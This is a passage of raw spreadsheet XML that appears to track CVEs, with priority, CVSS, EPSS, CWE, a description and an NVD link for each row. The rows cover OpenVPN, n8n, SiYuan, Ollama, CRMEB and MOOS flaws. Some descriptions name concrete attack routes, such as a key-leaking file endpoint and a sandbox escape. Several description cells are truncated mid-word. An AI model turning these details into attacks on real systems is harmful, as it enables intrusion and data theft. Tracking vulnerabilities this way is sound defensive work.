      </c>
    </row>
    <row r="1286">
      <c r="A1286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84732</t>
        </is>
      </c>
      <c r="C1286" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1286" s="5" t="inlineStr"/>
      <c r="F1286" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1286" s="5" t="inlineStr"/>
      <c r="H1286" s="5" t="inlineStr"/>
      <c r="I1286" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1286" s="5" t="inlineStr"/>
      <c r="K1286" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1286" s="5" t="inlineStr">
        <is>
          <t>Retransmissions of ACK packet ID in OpenVPN through 2.6.22 and 2.7.6 allow remote unauthenticated attackers to cause a denial of service via crafted inputs that trigger a timeout integer overflow</t>
        </is>
      </c>
      <c r="M1286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84732</t>
        </is>
      </c>
    </row>
    <row r="1287">
      <c r="A1287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85147</t>
        </is>
      </c>
      <c r="C1287" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1287" s="5" t="inlineStr"/>
      <c r="F1287" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1287" s="5" t="inlineStr"/>
      <c r="H1287" s="5" t="inlineStr"/>
      <c r="I1287" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1287" s="5" t="inlineStr"/>
      <c r="K1287" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1287" s="5" t="inlineStr">
        <is>
          <t>SmartIT Desktop Manager developed by Lightstar has a Use of Hard-coded Credentials vulnerability. Unauthenticated remote attackers can obtain a specific password from the source code, which can be used to retrieve the AES encryption key used for communication.</t>
        </is>
      </c>
      <c r="M1287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85147</t>
        </is>
      </c>
    </row>
    <row r="1288">
      <c r="A1288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85155</t>
        </is>
      </c>
      <c r="C1288" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1288" s="5" t="inlineStr"/>
      <c r="F1288" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1288" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1288" s="5" t="inlineStr"/>
      <c r="I1288" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1288" s="5" t="inlineStr"/>
      <c r="K1288" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1288" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo contains a SQL injection vulnerability in the sort column parameter of the get.json.php endpoint with APIName=channels that allows unauthenticated attackers to order results by arbitrary database columns including users.password and users.recoverPass. Attackers can exploit this ordering oracle to infer password hash values and recovery tokens, and trigger SQL errors that disclose the full query statement and database schema.</t>
        </is>
      </c>
      <c r="M1288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85155</t>
        </is>
      </c>
    </row>
    <row r="1289">
      <c r="A1289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85169</t>
        </is>
      </c>
      <c r="C1289" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1289" s="5" t="inlineStr"/>
      <c r="F1289" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1289" s="5" t="inlineStr"/>
      <c r="H1289" s="5" t="inlineStr"/>
      <c r="I1289" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1289" s="5" t="inlineStr"/>
      <c r="K1289" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1289" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 1.123.73, 2.35.4, and 2.36.2 contain an expression sandbox escape in the $fromAI handler. $fromAI resolved a caller-supplied placeholder name without requiring it to be an own property and admitted reserved keys; against a primitive input value it returned a live host-prototype reference. An attacker with workflow-build privilege can walk the prototype chain to the Function constructor and compile/execute arbitrary code in the main n8n process, leading to remote code execution.</t>
        </is>
      </c>
      <c r="M1289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85169</t>
        </is>
      </c>
    </row>
    <row r="1290">
      <c r="A1290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85174</t>
        </is>
      </c>
      <c r="C1290" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1290" s="5" t="inlineStr"/>
      <c r="F1290" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1290" s="5" t="inlineStr"/>
      <c r="H1290" s="5" t="inlineStr"/>
      <c r="I1290" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1290" s="5" t="inlineStr"/>
      <c r="K1290" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L1290" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 logs API tokens from query parameters in plaintext to an accessible log file when full-text search requests exceed timing thresholds. Authenticated attackers can read the log file via the getFile endpoint to recover admin API tokens and gain permanent administrative access.</t>
        </is>
      </c>
      <c r="M1290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85174</t>
        </is>
      </c>
    </row>
    <row r="1291">
      <c r="A1291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85175</t>
        </is>
      </c>
      <c r="C1291" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1291" s="5" t="inlineStr"/>
      <c r="F1291" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1291" s="5" t="inlineStr"/>
      <c r="H1291" s="5" t="inlineStr"/>
      <c r="I1291" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1291" s="5" t="inlineStr"/>
      <c r="K1291" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L1291" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions &lt;= 3.8.1 (fixed in v3.8.2) contain an incomplete blocklist in the IsForbiddenAbsPath() function (kernel/util/path_guard.go), which only blocks conf/conf.json by exact match and does not restrict the TLS private key (conf/key.pem) or CA private key (conf/ca.key) stored in the same conf/ directory. Because the getFile handler skips the blocklist for RoleAdministrator and all authenticated users receive RoleAdministrator in v3.8.1, any user (or any client on a default no-auth-code instance) can retrieve these private keys via POST /api/file/getFile. On deployments with TLS enabled, this allows decryption of captured HTTPS traffic (key.pem) and forging of certificates trusted by clients that imported SiYuan's CA (ca.key).</t>
        </is>
      </c>
      <c r="M1291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85175</t>
        </is>
      </c>
    </row>
    <row r="1292">
      <c r="A1292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85180</t>
        </is>
      </c>
      <c r="C1292" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1292" s="5" t="inlineStr"/>
      <c r="F1292" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1292" s="5" t="inlineStr"/>
      <c r="H1292" s="5" t="inlineStr"/>
      <c r="I1292" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1292" s="5" t="inlineStr"/>
      <c r="K1292" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1292" s="5" t="inlineStr">
        <is>
          <t>Ollama fails to validate redirect destinations when pulling tensor-layer models, allowing unauthenticated attackers to redirect blob downloads to arbitrary hosts. An attacker can control a registry, serve a malicious tensor-layer manifest, and cause the server to issue GET requests to internal hosts including cloud metadata endpoints.</t>
        </is>
      </c>
      <c r="M1292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85180</t>
        </is>
      </c>
    </row>
    <row r="1293">
      <c r="A1293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85212</t>
        </is>
      </c>
      <c r="C1293" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1293" s="5" t="inlineStr"/>
      <c r="F1293" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1293" s="5" t="inlineStr"/>
      <c r="H1293" s="5" t="inlineStr"/>
      <c r="I1293" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1293" s="5" t="inlineStr"/>
      <c r="K1293" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1293" s="5" t="inlineStr">
        <is>
          <t>CRMEB contains an authentication bypass vulnerability in the verifyAuth() method of SystemRoleServices.php that returns true from both conditional branches. Sub-administrators and accounts with no roles can access restricted admin endpoints by exploiting the inert role check that always permits requests.</t>
        </is>
      </c>
      <c r="M1293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85212</t>
        </is>
      </c>
    </row>
    <row r="1294">
      <c r="A1294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85429</t>
        </is>
      </c>
      <c r="C1294" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1294" s="5" t="inlineStr"/>
      <c r="F1294" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1294" s="5" t="inlineStr"/>
      <c r="H1294" s="5" t="inlineStr"/>
      <c r="I1294" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1294" s="5" t="inlineStr"/>
      <c r="K1294" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L1294" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP uFldNodeComms through 24.8.1 trusts the source node identity from the message body rather than validating it from the connection source. Attackers can craft NODE_MESSAGE packets with spoofed source identities to impersonate other nodes and post arbitrary variable notifications without validation.</t>
        </is>
      </c>
      <c r="M1294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85429</t>
        </is>
      </c>
    </row>
    <row r="1295">
      <c r="A1295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85431</t>
        </is>
      </c>
      <c r="C1295" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1295" s="5" t="inlineStr"/>
      <c r="F1295" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G1295" s="5" t="inlineStr"/>
      <c r="H1295" s="5" t="inlineStr"/>
      <c r="I1295" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1295" s="5" t="inlineStr"/>
      <c r="K1295" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L1295" s="5" t="inlineStr">
        <is>
          <t>MOOS essential-moos through version 10.0.1 contains an unauthenticated UDP packet injection vulnerability in pMOOSBridge when configured with UDPListen. Attackers can send crafted UDP packets to the configured port to inject arbitrary variables into the local MOOS community with spoofed source and community identifiers.</t>
        </is>
      </c>
      <c r="M1295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85431</t>
        </is>
      </c>
    </row>
    <row r="1296">
      <c r="A1296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85436</t>
        </is>
      </c>
      <c r="C1296" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1296" s="5" t="inlineStr"/>
      <c r="F1296" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G1296" s="5" t="inlineStr"/>
      <c r="H1296" s="5" t="inlineStr"/>
      <c r="I1296" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1296" s="5" t="inlineStr"/>
      <c r="K1296" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L1296" s="5" t="inlineStr">
        <is>
          <t>MOOS essential-moos through 10.0.1 contains a buffer overflow vulnerability in CMOOSUDPLink::ReadPktFromArray() that allows remote attackers to corrupt heap memory by sending UDP datagrams with negative declared lengths. Attackers can send crafted UDP packets to the configured UDPListen port to trigger an oversized memcpy operation that writes past the destination buffer, causing heap corruption and denial of service.</t>
        </is>
      </c>
      <c r="M1296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85436</t>
        </is>
      </c>
    </row>
    <row r="1297">
      <c r="A1297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85441</t>
        </is>
      </c>
      <c r="C1297" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1297" s="5" t="inlineStr"/>
      <c r="F1297" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1297" s="5" t="inlineStr"/>
      <c r="H1297" s="5" t="inlineStr"/>
      <c r="I1297" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1297" s="5" t="inlineStr"/>
      <c r="K1297" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="L1297" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 fails to validate that serialized string lengths are non-negative in CMOOSMsg::operator&gt;&gt;. Unauthenticated attackers can send a crafted message with a negative length value to the MOOSDB port, causing an unhandled exception that terminates the database process.</t>
        </is>
      </c>
      <c r="M1297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85441</t>
        </is>
      </c>
    </row>
    <row r="1298">
      <c r="A1298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85442</t>
        </is>
      </c>
      <c r="C1298" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1298" s="5" t="inlineStr"/>
      <c r="F1298" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1298" s="5" t="inlineStr"/>
      <c r="H1298" s="5" t="inlineStr"/>
      <c r="I1298" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1298" s="5" t="inlineStr"/>
      <c r="K1298" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="L1298" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 fails to validate packet length declarations in CMOOSCommPkt::OnBytesWritten(), allowing unauthenticated attackers to trigger unbounded buffer allocation by sending crafted wire packets. Attackers can send packets with large declared lengths to exhaust server memory and cause denial of service before client authentication completes.</t>
        </is>
      </c>
      <c r="M1298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85442</t>
        </is>
      </c>
    </row>
    <row r="1299">
      <c r="A1299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85443</t>
        </is>
      </c>
      <c r="C1299" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1299" s="5" t="inlineStr"/>
      <c r="F1299" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1299" s="5" t="inlineStr"/>
      <c r="H1299" s="5" t="inlineStr"/>
      <c r="I1299" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1299" s="5" t="inlineStr"/>
      <c r="K1299" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1299" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains a denial of service vulnerability in MOOSCommServer::ListenLoop() where the accept thread performs a blocking receive without timeout during the wire-protocol handshake. An attacker can open a TCP connection to the MOOSDB port and send no data, causing the accept thread to block indefinitely while holding the socket-list lock, preventing all subsequent client connections.</t>
        </is>
      </c>
      <c r="M1299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85443</t>
        </is>
      </c>
    </row>
    <row r="1300">
      <c r="A1300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85444</t>
        </is>
      </c>
      <c r="C1300" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1300" s="5" t="inlineStr"/>
      <c r="F1300" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1300" s="5" t="inlineStr"/>
      <c r="H1300" s="5" t="inlineStr"/>
      <c r="I1300" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1300" s="5" t="inlineStr"/>
      <c r="K1300" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1300" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP t</t>
        </is>
      </c>
      <c r="M1300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85444</t>
        </is>
      </c>
    </row>
    <row r="1301">
      <c r="A1301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85445</t>
        </is>
      </c>
      <c r="C1301" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1301" s="5" t="inlineStr"/>
      <c r="F1301" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1301" s="5" t="inlineStr"/>
      <c r="H1301" s="5" t="inlineStr"/>
      <c r="I1301" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1301" s="5" t="inlineStr"/>
      <c r="K1301" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="L1301" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP through 24.8.1 contains a denial of service vulnerability in the Demuxer::addMuxPacket() function that trusts the packet count declared in mux headers without validation. Attackers can declare arbitrarily large packet counts to trigger unbounded memory allocation, exhausting system resources and causing service unavailability.</t>
        </is>
      </c>
      <c r="M1301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85445</t>
        </is>
      </c>
    </row>
    <row r="1302">
      <c r="A1302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85446</t>
        </is>
      </c>
      <c r="C1302" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1302" s="5" t="inlineStr"/>
      <c r="F1302" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1302" s="5" t="inlineStr"/>
      <c r="H1302" s="5" t="inlineStr"/>
      <c r="I1302" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1302" s="5" t="inlineStr"/>
      <c r="K1302" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1302" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP versions through 24.8.1 contain a quadratic processing vulnerability in uFldNodeComms where each new node identity creates a ledger entry and triggers all-pairs distribution work. Attackers can supply unbounded distinct node names in reports to drive the shoreside broker into quadratic processing, delaying or preventing distribution of legitimate node reports.</t>
        </is>
      </c>
      <c r="M1302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85446</t>
        </is>
      </c>
    </row>
    <row r="1303">
      <c r="A1303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85447</t>
        </is>
      </c>
      <c r="C1303" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1303" s="5" t="inlineStr"/>
      <c r="F1303" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1303" s="5" t="inlineStr"/>
      <c r="H1303" s="5" t="inlineStr"/>
      <c r="I1303" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1303" s="5" t="inlineStr"/>
      <c r="K1303" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1303" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP p</t>
        </is>
      </c>
      <c r="M1303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85447</t>
        </is>
      </c>
    </row>
    <row r="1304">
      <c r="A1304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85448</t>
        </is>
      </c>
      <c r="C1304" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1304" s="5" t="inlineStr"/>
      <c r="F1304" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1304" s="5" t="inlineStr"/>
      <c r="H1304" s="5" t="inlineStr"/>
      <c r="I1304" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1304" s="5" t="inlineStr"/>
      <c r="K1304" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1304" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP uFldShoreBroker through 24.8.1 fails to limit the number of claimed communities stored in parallel vectors within ShoreBroker::handleMailNodePing(). A single publisher can supply unbounded distinct community names to grow retained state and per-pass work without limit, causing memory exhaustion and performance degradation.</t>
        </is>
      </c>
      <c r="M1304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85448</t>
        </is>
      </c>
    </row>
    <row r="1305">
      <c r="A1305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85449</t>
        </is>
      </c>
      <c r="C1305" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1305" s="5" t="inlineStr"/>
      <c r="F1305" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1305" s="5" t="inlineStr"/>
      <c r="H1305" s="5" t="inlineStr"/>
      <c r="I1305" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1305" s="5" t="inlineStr"/>
      <c r="K1305" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1305" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP p</t>
        </is>
      </c>
      <c r="M1305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85449</t>
        </is>
      </c>
    </row>
    <row r="1306">
      <c r="A1306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85450</t>
        </is>
      </c>
      <c r="C1306" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1306" s="5" t="inlineStr"/>
      <c r="F1306" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1306" s="5" t="inlineStr"/>
      <c r="H1306" s="5" t="inlineStr"/>
      <c r="I1306" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1306" s="5" t="inlineStr"/>
      <c r="K1306" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1306" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains a denial of service vulnerability in the MOOSDB HTTP server that creates unbounded connections and threads without limits. Attackers can open many connections and send endless header data to exhaust server threads and memory, causing service unavailability.</t>
        </is>
      </c>
      <c r="M1306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85450</t>
        </is>
      </c>
    </row>
    <row r="1307">
      <c r="A1307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85452</t>
        </is>
      </c>
      <c r="C1307" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1307" s="5" t="inlineStr"/>
      <c r="F1307" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1307" s="5" t="inlineStr"/>
      <c r="H1307" s="5" t="inlineStr"/>
      <c r="I1307" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1307" s="5" t="inlineStr"/>
      <c r="K1307" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1307" s="5" t="inlineStr">
        <is>
          <t>MOOS ui-moos through 50b9c6c contains a buffer overflow vulnerability in ScopeTabPane.cpp and ScopeGrid.cpp where client and variable names are formatted into fixed 1024-byte buffers using sprintf without length validation. Attackers can supply arbitrarily long MOOS identifiers that overflow the buffers when an operator selects process list entries or pokes variables, enabling code execution.</t>
        </is>
      </c>
      <c r="M1307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85452</t>
        </is>
      </c>
    </row>
    <row r="1308">
      <c r="A1308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85540</t>
        </is>
      </c>
      <c r="C1308" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1308" s="5" t="inlineStr"/>
      <c r="F1308" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1308" s="5" t="inlineStr"/>
      <c r="H1308" s="5" t="inlineStr"/>
      <c r="I1308" s="5" t="inlineStr">
